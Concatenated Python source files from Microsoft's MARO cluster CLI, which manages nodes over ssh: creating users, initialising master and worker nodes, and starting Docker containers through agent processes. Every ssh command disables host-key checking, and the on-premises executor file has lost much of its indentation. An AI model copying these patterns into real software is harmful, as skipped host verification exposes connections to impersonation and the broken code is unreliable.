            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_containers_details {self.cluster_name}'"
        )
        return_str = SubProcess.run(command)
        return json.loads(return_str)

    def remote_get_public_key(self, node_ip_address: str):
        """Return the node's public key, with the trailing newline stripped."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_public_key'"
        )
        return_str = SubProcess.run(command).strip("\n")
        logger.debug(return_str)
        return return_str

    def remote_init_build_node_image_vm(self, vm_ip_address: str):
        """Run the init script on the temporary node-image build VM (interactive output)."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{vm_ip_address} "
            "'python3 ~/init_build_node_image_vm.py'"
        )
        SubProcess.interactive_run(command)

    def remote_init_master(self):
        """Run the master init script (interactive output)."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.init_master {self.cluster_name}'"
        )
        SubProcess.interactive_run(command)

    def remote_init_node(self, node_name: str, node_ip_address: str):
        """Run the node init script on a worker node (interactive output)."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            f"'python3 ~/init_node.py {self.cluster_name} {node_name}'"
        )
        SubProcess.interactive_run(command)

    def remote_mkdir(self, node_ip_address: str, path: str):
        """Create a directory (with parents) on a remote node."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            f"'mkdir -p {path}'"
        )
        SubProcess.run(command)

    def remote_load_images(self, node_name: str, parallels: int, node_ip_address: str):
        """Load image files on a node (interactive output)."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_images "
            f"{self.cluster_name} {node_name} {parallels}'"
        )
        SubProcess.interactive_run(command)

    def remote_load_master_agent_service(self):
        """Start the master agent service on the master node."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_master_agent_service {self.cluster_name}'"
        )
        _ = SubProcess.run(command)

    def remote_load_node_agent_service(self, node_name: str, node_ip_address: str):
        """Start the node agent service on a worker node."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_node_agent_service "
            f"{self.cluster_name} {node_name}'"
        )
        _ = SubProcess.run(command)

    def remote_create_pending_job_ticket(self, job_name: str):
        """Create a pending-job ticket on the master."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_pending_job_ticket "
            f"{self.cluster_name} {job_name}'"
        )
        _ = SubProcess.run(command)

    def remote_create_job_details(self, job_name: str):
        """Create the job details record on the master."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_job_details "
            f"{self.cluster_name} {job_name}'"
        )
        _ = SubProcess.run(command)

    def remote_create_killed_job_ticket(self, job_name: str):
        """Create a killed-job ticket on the master."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.create_killed_job_ticket "
            f"{self.cluster_name} {job_name}'"
        )
        _ = SubProcess.run(command)

    def remote_delete_pending_job_ticket(self, job_name: str):
        """Delete a pending-job ticket on the master."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.delete_pending_job_ticket "
            f"{self.cluster_name} {job_name}'"
        )
        _ = SubProcess.run(command)

    def remote_set_master_details(self, master_details: dict):
        """Store the master details on the master; the dict travels base64-encoded."""
        master_details_b64 = base64.b64encode(json.dumps(master_details).encode("utf8")).decode('utf8')
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.set_master_details "
            f"{self.cluster_name} {master_details_b64}'"
        )
        _ = SubProcess.run(command)

    def remote_set_node_details(self, node_name: str, node_details: dict):
        """Store one node's details on the master; the dict travels base64-encoded."""
        node_details_b64 = base64.b64encode(json.dumps(node_details).encode("utf8")).decode('utf8')
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.set_node_details "
            f"{self.cluster_name} {node_name} {node_details_b64}'"
        )
        _ = SubProcess.run(command)

    def remote_update_image_files_details(self):
        """Refresh the image-file records on the master."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.update_image_files_details "
            f"{self.cluster_name}'"
        )
        _ = SubProcess.run(command)

    def remote_update_node_status(self, node_name: str, action: str):
        """Update a node's status record on the master (e.g. start/stop actions)."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.update_node_status "
            f"{self.cluster_name} {node_name} {action}'"
        )
        _ = SubProcess.run(command)

    def test_ssh_22_connection(self, node_ip_address: str):
        """Probe the node on the default ssh port 22; raises on failure/timeout."""
        command = (
            f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
            "echo 'Connection established'"
        )
        _ = SubProcess.run(command=command, timeout=5)

    def test_ssh_default_port_connection(self, node_ip_address: str):
        """Probe the node on the cluster's configured ssh port; raises on failure/timeout."""
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
            "echo 'Connection established'"
        )
        _ = SubProcess.run(command=command, timeout=5)

    def remote_set_ssh_port(self, node_ip_address: str):
        """Reconfigure sshd on the node to also listen on the cluster's ssh port."""
        # Don't have to do the setting if it is assigned 22
        if self.ssh_port == 22:
            return
        # Set ssh port (port 22 is kept so the current session style still works).
        command = (
            f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
            f"'echo -e \"Port {self.ssh_port}\nPort 22\" | sudo tee -a /etc/ssh/sshd_config'"
        )
        _ = SubProcess.run(command)
        # Restart sshd service.
        command = (
            f"ssh -o StrictHostKeyChecking=no {self.admin_username}@{node_ip_address} "
            "'sudo systemctl restart ssh'"
        )
        _ = SubProcess.run(command)

    def retry_connection_and_set_ssh_port(self, node_ip_address: str) -> bool:
        """Try to reach the node on the configured port, falling back to port 22.

        When only port 22 responds, the configured port is installed via
        ``remote_set_ssh_port``. Raises ClusterInternalError after the retry
        budget is exhausted.
        """
        remain_retries = 20
        while remain_retries > 0:
            try:
                self.test_ssh_default_port_connection(node_ip_address=node_ip_address)
                return True
            except (CliError, TimeoutExpired):
                remain_retries -= 1
                logger.debug(
                    f"Unable to connect to {node_ip_address} with port {self.ssh_port}, "
                    f"remains {remain_retries} retries."
                )
            try:
                self.test_ssh_22_connection(node_ip_address=node_ip_address)
                self.remote_set_ssh_port(node_ip_address=node_ip_address)
                return True
            except (CliError, TimeoutExpired):
                remain_retries -= 1
                logger.debug(
                    f"Unable to connect to {node_ip_address} with port 22, remains {remain_retries} retries."
                )
            time.sleep(10)
        raise ClusterInternalError(f"Unable to connect to {node_ip_address}.")

    # Create a new user account on target OS.
    @staticmethod
    def remote_add_user_to_node(admin_username: str, maro_user: str, node_ip_address: str, pubkey: str):
        # The admin_user is an already exist account which has privileges to create new account on target OS.
        command = (
            f"ssh {admin_username}@{node_ip_address} 'sudo python3 ~/create_user.py {maro_user} \"{pubkey}\"'"
        )
        _ = SubProcess.run(command)

    # Delete maro cluster user account on target OS.
    @staticmethod
    def remote_delete_user_from_node(admin_username: str, delete_user: str, node_ip_address: str):
        # The admin_user is an already exist account which has privileges to create new account on target OS.
        command = (
            f"ssh {admin_username}@{node_ip_address} 'sudo python3 ~/delete_user.py {delete_user}'"
        )
        _ = SubProcess.run(command)

    def delete_master_details(self, cluster_name: str):
        """Delete the master details record on the master node.

        Args:
            cluster_name (str): kept for interface compatibility; the executor's
                own ``self.cluster_name`` is what is passed to the remote script.
        """
        # Fixed: use the configured ssh port like every other remote call
        # (previously '-p' was missing, so clusters on a non-default port
        # failed here), and drop the stray trailing space after the name.
        command = (
            f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
            f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
            f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.delete_master_details "
            f"{self.cluster_name}'"
        )
        _ = SubProcess.run(command)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import secrets
import string
from shutil import rmtree
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.copy import copy_files_to_node
from maro.cli.utils.details import (load_cluster_details, save_cluster_details)
from maro.cli.utils.naming import generate_cluster_id
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.cli.utils.validation import validate_and_fill_dict
from maro.utils.exception.cli_exception import CliError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassOnPremisesExecutor:
def __init__(self, cluster_name: str):
self.cluster_name = cluster_name
self.cluster_details = load_cluster_details(cluster_name=cluster_name)
self.grass_executor = GrassExecutor(cluster_details=self.cluster_details)
@staticmethod
def build_cluster_details(create_deployment: dict):
# Standardize create deployment
GrassOnPremisesExecutor._standardize_create_deployment(create_deployment=create_deployment)
# Create user account
logger.info("Now is going to create an user account for maro cluster node.")
if "super_user" in create_deployment["user"]:
super_user = create_deployment["user"]["super_user"]
else:
super_user = ""
GrassOnPremisesExecutor.create_user(
admin_username=super_user,
maro_user=create_deployment["user"]["admin_username"],
ip_address=create_deployment["master"]["public_ip_address"],
pubkey=create_deployment["user"]["admin_public_key"],
ssh_port=create_deployment["connection"]["ssh"]["port"]
)
# Get cluster name and save details
cluster_name = create_deployment["name"]
if os.path.isdir(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}")):
raise CliError(f"Cluster {cluster_name} already exist.")
os.makedirs(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}"))
save_cluster_details(
cluster_name=cluster_name,
cluster_details=create_deployment
)
@staticmethod
def _standardize_create_deployment(create_deployment: dict):
alphabet = string.ascii_letters + string.digits
optional_key_to_value = {
"root['master']['redis']": {'port': 6379},
"root['master']['redis']['port']": 6379,
"root['master']['fluentd']": {'port': 24224},
"root['master']['fluentd']['port']": 24224,
"root['master']['samba']": {'password': ''.join(secrets.choice(alphabet) for _ in range(20))},
"root['master']['samba']['password']": ''.join(secrets.choice(alphabet) for _ in range(20)),
"root['connection']": {"ssh": {"port": GlobalParams.DEFAULT_SSH_PORT}},
"root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
"root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT
}
with open(
os.path.expanduser(
f"{GlobalPaths.MARO_GRASS_LIB}/deployments/internal/grass-on-premises-create.yml")) as fr:
create_deployment_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=create_deployment_template,
actual_dict=create_deployment,
optional_key_to_value=optional_key_to_value
)
def create(self):
logger.info("Creating cluster")
# Start creating
try:
self._set_cluster_id()
self._set_master_info()
self._init_master()
except Exception as e:
# If failed, remove details folder, then raise
rmtree(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}"))
raise CliError(f"Failure to create cluster, due to {e}")
logger.info_green(f"Cluster {self.cluster_name} has been created.")
def _set_cluster_id(self):
# Load details
cluster_details = self.cluster_details
# Set cluster id
cluster_details["id"] = generate_cluster_id()
# Save details
save_cluster_details(
cluster_name=self.cluster_name,
cluster_details=cluster_details
)
def _create_path_in_list(self, target_ip: str, path_list):
for path_to_create in path_list:
self.grass_executor.remote_mkdir(
path=path_to_create,
node_ip_address=target_ip
)
def _set_master_info(self):
# Load details
cluster_details = self.cluster_details
cluster_id = cluster_details["id"]
master_details = cluster_details["master"]
hostname = cluster_details["master"]["public_ip_address"]
master_details["private_ip_address"] = cluster_details["master"]["public_ip_address"]
master_details["hostname"] = hostname
master_details["resource_name"] = f"{cluster_id}-master-vm"
admin_username = cluster_details["user"]["admin_username"]
public_ip_address = cluster_details["master"]["public_ip_address"]
logger.info_green(f"You can login to your master node with: ssh {admin_username}@{public_ip_address}")
    def _init_master(self):
        """Bootstrap the master node: folders, file sync, init script, agent service, save details.

        Side effects: adds "public_key" to cluster_details["master"], persists the cluster
        details locally, and pushes the master details to the master's own store.
        The remote calls below are order-dependent (connect before mkdir, copy before init).
        """
        logger.info("Initializing master node")
        # Load details
        cluster_details = self.cluster_details
        master_details = cluster_details["master"]
        admin_username = cluster_details["user"]["admin_username"]
        master_public_ip_address = cluster_details["master"]["public_ip_address"]
        ssh_port = cluster_details["connection"]["ssh"]["port"]
        # Make sure master is able to connect
        self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=master_public_ip_address)
        # Create folders (set literal: paths are independent, creation order does not matter)
        path_list = {
            GlobalPaths.MARO_GRASS_LIB,
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules"
        }
        self._create_path_in_list(master_public_ip_address, path_list)
        # Copy required files
        copy_files_to_node(
            local_path=GlobalPaths.MARO_GRASS_LIB,
            remote_dir=GlobalPaths.MARO_LIB,
            admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
        )
        copy_files_to_node(
            local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
            remote_dir=GlobalPaths.MARO_CLUSTERS,
            admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
        )
        # Get public key
        public_key = self.grass_executor.remote_get_public_key(node_ip_address=master_public_ip_address)
        # Remote init master
        self.grass_executor.remote_init_master()
        # Load master agent service
        self.grass_executor.remote_load_master_agent_service()
        # Save details (locally first, then mirror the master section remotely)
        master_details["public_key"] = public_key
        save_cluster_details(
            cluster_name=self.cluster_name,
            cluster_details=cluster_details
        )
        self.grass_executor.remote_set_master_details(master_details=cluster_details["master"])
        logger.info_green("Master node is initialized")
def delete(self):
# Load details
cluster_name = self.cluster_name
logger.info(f"Deleting cluster {cluster_name}")
# Delete redis and other services
node_details_list = self.grass_executor.remote_get_nodes_details()
for node_name, node_details in node_details_list.items():
self.node_leave_cluster(node_name)
# Delete cluster folder
rmtree(os.path.expanduser(f"{GlobalPaths.MARO_CLUSTERS}/{cluster_name}"))
self.grass_executor.remote_clean(1)
self.grass_executor.delete_master_details(cluster_name)
logger.info_green(f"The cluster {cluster_name} has been deleted.")
def node_join_cluster(self, node_join_info: dict):
node_name = node_join_info["name"]
cluster_details = self.cluster_details
node_ip_address = node_join_info["public_ip_address"]
# Create user account
logger.info(f"Now is going to create an user account for maro working node {node_name}.")
if "super_user" in node_join_info:
super_user = node_join_info["super_user"]
else:
super_user = ""
GrassOnPremisesExecutor.create_user(
admin_username=super_user,
maro_user=cluster_details["user"]["admin_username"],
ip_address=node_ip_address,
pubkey=cluster_details["user"]["admin_public_key"],
ssh_port=cluster_details["connection"]["ssh"]["port"]
)
self._create_node_data(node_join_info)
self._init_node(node_name)
def _create_node_data(self, node_join_info: dict):
# Load details
cluster_details = self.cluster_details
cluster_id = cluster_details["id"]
node_name = node_join_info["name"]
node_ip_address = node_join_info["public_ip_address"]
# Get resources
cpu = node_join_info["resources"]["cpu"]
memory = node_join_info["resources"]["memory"]
gpu = node_join_info["resources"]["gpu"]
# Save details
node_details = {
"public_ip_address": node_ip_address,
"private_ip_address": node_ip_address,
"node_size": "",
"resource_name": f"{cluster_id}-{node_name}-vm",
"hostname": f"{cluster_id}-{node_name}-vm",
"resources": {
"cpu": cpu,
"memory": memory,
"gpu": gpu
},
"containers": {}
}
self.grass_executor.remote_set_node_details(
node_name=node_name,
node_details=node_details,
)
    def _init_node(self, node_name: str):
        """Bootstrap a worker node: folders, file sync, init script, status, images, agent service.

        Args:
            node_name (str): name of the node; its details are fetched from the master store.
        """
        logger.info(f"Initiating node {node_name}.")
        # Load details
        cluster_details = self.cluster_details
        admin_username = cluster_details["user"]["admin_username"]
        node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
        node_public_ip_address = node_details["public_ip_address"]
        ssh_port = cluster_details["connection"]["ssh"]["port"]
        # Make sure the node is able to connect
        self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=node_public_ip_address)
        # Create folders (same layout as on the master node)
        path_list = {
            GlobalPaths.MARO_GRASS_LIB,
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs",
            f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules"
        }
        self._create_path_in_list(node_public_ip_address, path_list)
        # Copy required files
        copy_files_to_node(
            local_path=GlobalPaths.MARO_GRASS_LIB,
            remote_dir=GlobalPaths.MARO_LIB,
            admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
        )
        copy_files_to_node(
            local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}",
            remote_dir=GlobalPaths.MARO_CLUSTERS,
            admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
        )
        # Remote init node
        self.grass_executor.remote_init_node(
            node_name=node_name,
            node_ip_address=node_public_ip_address
        )
        # Get public key
        public_key = self.grass_executor.remote_get_public_key(node_ip_address=node_public_ip_address)
        # Save details
        node_details["public_key"] = public_key
        self.grass_executor.remote_set_node_details(
            node_name=node_name,
            node_details=node_details
        )
        # Update node status
        # Since On-Premises machines don't need to shutdown, it will be set to start directly.
        self.grass_executor.remote_update_node_status(
            node_name=node_name,
            action="start"
        )
        # Load images
        self.grass_executor.remote_load_images(
            node_name=node_name,
            parallels=GlobalParams.PARALLELS,
            node_ip_address=node_public_ip_address
        )
        # Load node agent service
        self.grass_executor.remote_load_node_agent_service(
            node_name=node_name,
            node_ip_address=node_public_ip_address
        )
        logger.info_green(f"Node {node_name} has been initialized.")
    def node_leave_cluster(self, node_name: str):
        """Detach a node: stop it, delete its redis record, and remove the maro user account.

        NOTE(review): delete_user is invoked with admin_username="", which forces an
        interactive prompt — confirm this is acceptable for scripted/non-interactive deletion.
        """
        cluster_details = self.cluster_details
        nodes_details = self.grass_executor.remote_get_nodes_details()
        # Unknown node: warn and bail out rather than raise.
        if node_name not in nodes_details:
            logger.warning(f"The specified node cannot be found in cluster {cluster_details['name']}.")
            return
        node_details = nodes_details[node_name]
        # Update node status
        self.grass_executor.remote_update_node_status(
            node_name=node_name,
            action="stop"
        )
        # Delete node record in redis.
        self.grass_executor.remote_update_node_status(node_name, "delete")
        admin_username = cluster_details["user"]["admin_username"]
        node_ip_address = node_details["public_ip_address"]
        ssh_port = cluster_details["connection"]["ssh"]["port"]
        GrassOnPremisesExecutor.delete_user(
            admin_username="",
            maro_user=admin_username,
            ip_address=node_ip_address,
            ssh_port=ssh_port
        )
        logger.info_green(f"The node {node_name} has been left cluster {cluster_details['name']}.")
@staticmethod
def create_user(admin_username: str, maro_user: str, ip_address: str, pubkey: str, ssh_port: int) -> None:
if "" == admin_username:
print("Please input a user account that has permissions to create user:")
admin_username = input("> ")
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/create_user.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=ip_address, ssh_port=ssh_port
)
GrassExecutor.remote_add_user_to_node(admin_username, maro_user, ip_address, pubkey)
@staticmethod
def delete_user(admin_username: str, maro_user: str, ip_address: str, ssh_port: int) -> None:
if "" == admin_username:
admin_username = input("Please input a user account that has permissions to delete user:\r\n")
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/delete_user.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=ip_address, ssh_port=ssh_port
)
GrassExecutor.remote_delete_user_from_node(admin_username, maro_user, ip_address)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.cli.grass.executors.grass_azure_executor import GrassAzureExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def push_image(
    cluster_name: str, image_name: str, image_path: str, remote_context_path: str, remote_image_name: str,
    **kwargs
):
    """Push a docker image to the named cluster.

    Guard clause: any mode other than grass/azure or grass/on-premises is rejected.
    NOTE(review): GrassAzureExecutor is used for grass/on-premises as well — presumably
    push_image is mode-agnostic at the executor level; confirm.
    """
    cluster_details = load_cluster_details(cluster_name=cluster_name)
    if cluster_details["mode"] not in ["grass/azure", "grass/on-premises"]:
        raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
    executor = GrassAzureExecutor(cluster_name=cluster_name)
    executor.push_image(
        image_name=image_name,
        image_path=image_path,
        remote_context_path=remote_context_path,
        remote_image_name=remote_image_name
    )
--- FILE SEPARATOR ---
class AllocationFailed(Exception):
    """Raised when no allocation plan can satisfy a job's resource requirements."""
    pass
class StartContainerFailed(Exception):
    """Raised when the remote `docker run` command exits with a non-zero return code."""
    pass
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import heapq
import json
import logging
import multiprocessing
import os
import subprocess
import sys
import time
import uuid
from redis import Redis
from .exception import AllocationFailed, StartContainerFailed
from .resource import ContainerResource, NodeResource
from .utils import (
delete_rejoin_container_name_to_component_name, get_containers_details, get_job_details, get_job_runtime_details,
get_jobs_details, get_killed_job_tickets, get_node_details, get_nodes_details, get_pending_job_tickets,
get_rejoin_component_restart_times, get_rejoin_container_name_to_component_name,
incr_rejoin_component_restart_times, load_cluster_details, remove_killed_job_ticket, remove_pending_job_ticket,
set_containers_details, set_job_details
)
logger = logging.getLogger(__name__)

# ssh-wrapped `docker run` command template, filled in via str.format by the agents below.
# Container logs are shipped to the master's fluentd endpoint via the fluentd log driver.
START_CONTAINER_COMMAND = (
    "ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
    "docker run "
    "-it -d "
    "--cpus {cpu} "
    "-m {memory} "
    "--name {container_name} "
    "--network host "
    "--log-driver=fluentd "
    "--log-opt tag=maro.job_id.{job_id}.container_name.{container_name} "
    "--log-opt fluentd-address={master_hostname}:{fluentd_port} "
    "-v {mount_source}:{mount_target} "
    "{environment_parameters} {labels} "
    "{image_name} {command}"
)

# Same as START_CONTAINER_COMMAND plus the `--gpus` flag; chosen when the component requests GPUs.
START_CONTAINER_WITH_GPU_COMMAND = (
    "ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
    "docker run "
    "-it -d "
    "--cpus {cpu} "
    "-m {memory} "
    "--gpus {gpu} "
    "--name {container_name} "
    "--network host "
    "--log-driver=fluentd "
    "--log-opt tag=maro.job_id.{job_id}.container_name.{container_name} "
    "--log-opt fluentd-address={master_hostname}:{fluentd_port} "
    "-v {mount_source}:{mount_target} "
    "{environment_parameters} {labels} "
    "{image_name} {command}"
)

# Force-remove ({containers} is a space-separated list of names).
REMOVE_CONTAINER_COMMAND = (
    "ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
    "docker rm -f {containers}"
)

# Graceful stop ({containers} is a space-separated list of names).
STOP_CONTAINER_COMMAND = (
    "ssh -o StrictHostKeyChecking=no -p {ssh_port} {admin_username}@{node_hostname} "
    "docker stop {containers}"
)

# Metrics that single-metric allocation strategies may balance on.
AVAILABLE_METRICS = {
    "cpu",
    "memory",
    "gpu"
}

# Container exit codes with agreed-upon meanings for the fault-tolerance logic.
ERROR_CODE_FOR_NOT_RESTART = 64
ERROR_CODE_FOR_STOP_JOB = 65

# Exit codes for which an exited container must NOT be restarted (0 = clean exit).
ERROR_CODES_FOR_NOT_RESTART_CONTAINER = {
    0, ERROR_CODE_FOR_NOT_RESTART, ERROR_CODE_FOR_STOP_JOB
}
class MasterAgent:
    """Entry point that spawns all master-side agent processes for one cluster."""

    def __init__(self, cluster_name: str):
        self._cluster_name = cluster_name
        self._cluster_details = load_cluster_details(cluster_name=cluster_name)

    def start(self) -> None:
        """Start agents.

        Returns:
            None.
        """
        # Construct and start each agent process in turn (same order as before).
        agent_classes = (
            JobTrackingAgent,
            ContainerTrackingAgent,
            PendingJobAgent,
            ContainerRuntimeAgent,
            KilledJobAgent,
        )
        for agent_class in agent_classes:
            agent = agent_class(cluster_details=self._cluster_details)
            agent.start()
class JobTrackingAgent(multiprocessing.Process):
    """Periodically fold the latest containers_details into each job's details in redis."""

    def __init__(self, cluster_details: dict, check_interval: int = 5):
        super().__init__()
        self._cluster_details = cluster_details
        self._cluster_name = cluster_details["name"]
        self._redis = Redis(
            host="localhost",
            port=cluster_details["master"]["redis"]["port"],
            charset="utf-8", decode_responses=True
        )
        self._check_interval = check_interval

    def run(self) -> None:
        """Start updating jobs_details.

        Returns:
            None.
        """
        # Infinite polling loop; this process never returns.
        while True:
            self._update_jobs_details()
            time.sleep(self._check_interval)

    def _update_jobs_details(self) -> None:
        """Update jobs_details with containers_details.

        Returns:
            None.
        """
        # Get details and mapping.
        containers_details = get_containers_details(
            redis=self._redis,
            cluster_name=self._cluster_name
        )
        jobs_details = get_jobs_details(
            redis=self._redis,
            cluster_name=self._cluster_name
        )
        job_id_to_job_name = self._get_job_id_to_job_name(jobs_details=jobs_details)
        # Attach each container's details to the job it belongs to.
        for container_name, container_details in containers_details.items():
            curr_job_id = container_details["job_id"]
            if curr_job_id in job_id_to_job_name:
                curr_job_name = job_id_to_job_name[curr_job_id]
                jobs_details[curr_job_name]["containers"][container_name] = container_details
            else:
                logger.warning(f"Job Id {curr_job_id} is not found")
        # Save jobs details, stamped with the redis server's current time (seconds).
        for job_name, job_details in jobs_details.items():
            job_details["check_time"] = self._redis.time()[0]
            set_job_details(
                redis=self._redis,
                cluster_name=self._cluster_name,
                job_name=job_name,
                job_details=job_details
            )

    # Utils.

    @staticmethod
    def _get_job_id_to_job_name(jobs_details: dict) -> dict:
        """Get job_id_to_job_name mapping from jobs_details.

        Args:
            jobs_details: Details of the jobs.

        Returns:
            dict[int, str]: job_id_to_job_name mapping.
        """
        # Dict comprehension replaces the manual accumulation loop.
        return {job_details["id"]: job_name for job_name, job_details in jobs_details.items()}
class ContainerTrackingAgent(multiprocessing.Process):
    """Periodically rebuild the cluster-wide containers_details from per-node details."""

    def __init__(self, cluster_details: dict, check_interval: int = 5):
        super().__init__()
        self._cluster_details = cluster_details
        self._cluster_name = cluster_details["name"]
        self._redis = Redis(
            host="localhost",
            port=cluster_details["master"]["redis"]["port"],
            charset="utf-8", decode_responses=True
        )
        self._check_interval = check_interval

    def run(self) -> None:
        """Start updating containers_details.

        Returns:
            None.
        """
        # Infinite polling loop; this process never returns.
        while True:
            self._update_containers_details()
            time.sleep(self._check_interval)

    def _update_containers_details(self) -> None:
        """Update containers_details with nodes_details.

        Returns:
            None.
        """
        # Get details and init params.
        nodes_details = get_nodes_details(redis=self._redis, cluster_name=self._cluster_name)
        containers_details = {}
        # Merge every node's container map; keys were unused, so iterate values directly.
        for node_details in nodes_details.values():
            containers_details.update(node_details["containers"])
        # Save containers_details.
        set_containers_details(
            redis=self._redis,
            cluster_name=self._cluster_name,
            containers_details=containers_details
        )
class ContainerRuntimeAgent(multiprocessing.Process):
    """Watch exited containers and, per rejoin rules, remove/restart them or stop the whole job."""

    def __init__(self, cluster_details: dict, check_interval: int = 5):
        super().__init__()
        self._cluster_name = cluster_details["name"]
        self._cluster_id = cluster_details["id"]
        self._admin_username = cluster_details["user"]["admin_username"]
        self._fluentd_port = cluster_details["master"]["fluentd"]["port"]
        self._ssh_port = cluster_details["connection"]["ssh"]["port"]
        self._master_hostname = cluster_details["master"]["hostname"]
        self._redis = Redis(
            host="localhost",
            port=cluster_details["master"]["redis"]["port"],
            charset="utf-8", decode_responses=True
        )
        self._check_interval = check_interval

    def run(self) -> None:
